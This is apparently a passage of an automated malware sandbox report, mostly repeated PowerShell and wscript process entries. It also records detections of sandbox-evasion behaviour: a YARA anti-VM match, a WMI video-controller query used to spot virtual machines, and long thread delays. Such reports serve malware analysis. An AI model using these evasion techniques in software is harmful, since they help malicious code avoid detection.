                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 14A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 5080000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 29A0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2B30000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4B30000 memory reserve | memory write watch
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1314Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1739Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4657Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5159Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2893Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2146Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2933Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 6822Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1357Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 874Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 675Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8593Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1117Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4912
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep count: 4657 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep count: 5159 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6556Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3292Thread sleep count: 2893 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820Thread sleep count: 2146 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 432Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6448Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6428Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1784Thread sleep count: 2933 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1784Thread sleep count: 6822 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5136Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 874 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 675 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6556Thread sleep count: 8593 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400Thread sleep count: 1117 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep count: 31 > 30Jump to behavior
